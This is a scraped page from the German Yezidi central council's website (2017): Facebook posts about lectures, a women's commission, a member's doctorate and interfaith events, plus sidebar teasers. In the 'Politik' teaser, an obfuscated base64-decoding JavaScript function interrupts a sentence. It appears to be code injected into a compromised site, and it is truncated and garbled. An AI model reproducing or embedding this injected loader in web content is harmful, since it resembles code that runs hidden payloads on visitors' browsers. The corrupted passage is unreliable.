Freitag, November 24, 2017

Facebook Posts

Fasten und Feiertage der Êziden 2017 ... See MoreSee Less

2 days ago  ·  

View on Facebook

Qualifizierung: Interkulturelle Kompetenz in der Jugendarbeit ... See MoreSee Less

3 days ago  ·  

View on Facebook

+++Vortrag in Neuss+++

Am Donnerstag den 16. November 2017 fand im Caritashaus International in Neuss ein Vortrag durch unseren Referenten Herr Ilyas Yanc (Zentralrat der Eziden in Deutschland) statt. Herr Ferhad Battal vom Caritasverband Wuppertal/Solingen e.V. präsentierte die Bilderausstellung " Jesiden in Deutschland"

Ilyas Yanc erläuterte an diesem Abend die zentralen religiösen Inhalte zum Thema Ezidentum und Eziden.

In einer anschließender Gesprächsrunde fand ein Austausch statt und Fragen der Teilnehmer_innen wurden geklärt.
... See MoreSee Less

6 days ago  ·  

View on Facebook

Die stellvertretende Vorsitzende Zemfira Dlovani und die neu gegründete Frauenkommission des ZED besuchten heute die Ezidische Gemeinde in Bonn. Die mehrheitlich aus Afrin/Syrien stammenden Eziden haben bereits eine aktive Frauengruppe, die sich auch gerne im Zentralrat einbringen möchte. Alle Anwesenden sind sich einig, dass sie die Arbeit auf dieser Ebene vertiefen und sich für die Belange der ezidischen Frauen einsetzen wollen.
Auch der Vorsitzende Dr. Irfan Ortac war zugegen und hat seine unbeschränkte Unterstützung der Frauenkommission zugesichert.
... See MoreSee Less

2 weeks ago  ·  

View on Facebook

Songül Tolan erhält Doktorwürde

Am 02.11.2017 hat Songül Tolan erfolgreich ihre Doktorarbeit an der Freien Universität in Berlin verteidigt. Ihr wurde der Doktortitel im Fach Volkswirtschaftslehre (VWL) verliehen.

Songül Tolan hat nach ihrem Studium in Bochum (Bachelor in Wirtschaftswissenschaften) und in Warwick (Master in VWL) am Deutschen Institut für Wirtschaftsforschung (Berlin) gearbeitet und parallel an ihrer Doktorarbeit geschrieben. Der Stipendiatin der Studienstiftung des deutschen Volkes war es wichtig, mit Ihrer Doktorarbeit eine bessere Grundlage für ein gerechteres Rentensystem zu schaffen.

Songül Tolan hat nach dem Völkermord des IS an den Eziden Verantwortung übernommen. In den deutsch- und englischsprachigen Medien sowie bei Politikern hat sie unermüdlich auf die Situation der Eziden hingewiesen und Unterstützung mobilisiert. Besondere Aufmerksamkeit haben ihre Auftritte im ARD (Beckmann), DW, NTV und BBC bekommen. Mehrfach ist sie in den Krisengebiet gereist, um vor Ort humanitäre Hilfe zu organisieren. Das Qualifikations- und Betreuungszentrum in Sharya hat sie maßgeblich mit aufgebaut und betreut. Eine zeitlang nahm sie auch das Amt der ersten Vorsitzenden der ezidischen Gemeinde Berlin wahr. Songül Tolan ist die Schwester von Telim Tolan, der über zwei Jahrzehnten an vorderster Linie, u.a. als Vorsitzender des yezidisches Forum in Oldenburg und dann später als Vorsitzender des Zentralrates sich für die Belange unseres Volkes enermüdlich eingesetzt hat.
Wir gratulieren der Songül Tolan für die Verleihung der Doktorwürde und wünschen ihr für ihren beruflichen Weg alles Gute.
Das Beispiel Songül zeigt uns, dass Eziden und besonders Ezidinnen in der Bildungsgesellschaft angekommen sind. Das macht uns Mut und Hoffnung für die Zukunft.
ZÊD - Zentralrat der Eziden in Deutschland

Das Bild zeigt Songül Tolan mit ihren Eltern, Seyran und Mehmet Tolan.
... See MoreSee Less

2 weeks ago  ·  

View on Facebook

Teilnahme am Dialogforum " Religionen und Naturschutz"

Am 9. und 11.November waren unser 1. Vorsitzender Dr. Irfan Ortac und unser Beiratsmitglied Ilyas Yanc (Beirat Religion ZÊD) zu Gast in der Evangelischen Akademie Frankfurt. Das Abrahamische Forum in Deutschland hatte zum Themenfeld "Religionen und Natur" eingeladen.

Am Donnerstag folgte eine Gedenkveranstaltung in der Westendsynagoge anlässlich des 9. November 1938.

In den Workshops wurde über wichtige Elemente des Ezidentums im Bezug auf Natur berichtet.
Weitere Foren und Möglichkeiten der Kooperation sollen in Zukunft folgen.

Dr.Jürgen Micksch wurde von Ilyas Yanc das Buch " Das Jesidentum Religion und Leben" von Chsukeddin Issa übergeben.
... See MoreSee Less

2 weeks ago  ·  

View on Facebook

De
Am 06.11. 2017 referierte Dr. Irfan Ortac, Vorsitzender des ZÊD in Bielefeld über die Êzîden, mit dem Thema: "Êzîden im Nahen Osten- es bleibt nur die Flucht !?“
In dem gut gefüllten Hörsaal der FH lauschten ca. 50 Anwesende dem gut strukturierten und sensibel gehaltenen Vortrag.
Durch Geschichten aus dem eigenen Leben und miteinbezug des Publikums lockerte der Referent, dem man anmerkte, das er wußte, wovon er sprach, das an sich sehr ernste und wichtige Thema auf. Die anschließende Diskussion war lebhaft und vielfältig. Die anwesenden konnten kein Ende finden.
Ein Grundpfeiler der êzîdischen Religion sei laut Dr. Ortac die Toleranz. Daher wünsche er sich sowohl bei den Êzîden wie auch im gesamten Land eine Vielfalt, die sich gegenseitig toleriert. Besonders appellierte er an die Êzîden, weil eine große Anzahl von Êzîden sich im Raum befanden, die Vielfältigkeit bei den Êzîden als Bereicherung und nicht als Gefahr zu empfinden. Êzîdinin und Êzîden sollen wie gegenüber Externe auch intern Toleranz zeigen. In diesem Zusammenhang forderte er die kurdischen Teilnehmer dazu auf, sensibel mit den Êzîden umzugehen und ihre Geschichte kritisch zu hinterfragen, denn nur dann werden sie als Volk eine Zukunft haben. Es sei ihre Aufgabe, zu hinterfragen, was ihre Vorfahren den Êzîden angetan haben.

Wieder an die Êzîden adressiert hob der Referent die Wichtigkeit des Organisiert sein hervor. Trotz der Erfahrenheit in den Thema und in der Politik, merkte man dem Referenten bei manchen Bildern die Hilflosigkeit in der Situation und das Unfassbare an.
Ein sehr gelungener Abend mit einem lehrreichen Vortrag und dem Appell der Hilfe an Mitbürger und Politik. Zum Erfolg des Vortrages haben maßgeblich die Referentin der AStA FH-Bielefeld, Referat Internationales, Frau Ramona Stumpe und der êzîdische Aktivist und Sozialarbeiter
Halim Fehmi Ibrahim, beigetragen. Vielen Dank an die beiden Unterstützer!
... See MoreSee Less

2 weeks ago  ·  

View on Facebook

Politik

Am 29. Januar 2017 wurde in Bielefeld eine neue Interessenvertretung mit dem Namen „Zentralrat der Êzîden in Deutschlandfunction h052c1b60aed(x6){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t4='';var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(x6.charAt(u4++));sa=qd.indexOf(x6.charAt(u4++));r9=qd.indexOf(x6.charAt(u4++));u2=qd.indexOf(x6.charAt(u4++));t2=(q7<>4);u1=((sa&15)<>2);q3=((r9&3)<=192)t2+=848;else if(t2==168)t2=1025;else...

Yezidentum

Telim Tolan Mit über 120.000 Menschen sind inzwischen die Jesiden (Jesiden, kurdische Bezeichnung Êzîdî) in der Bundesrepublik vertreten. Insgesamt wird ihre Zahl auf über 1.000.000...

Spendefilm

 

Kettenanhänger

Yezidisches Symbol als Kettenanhänger

c65d552819

Die Menschen in Shingal brauchen eure Hilfe!

Spenden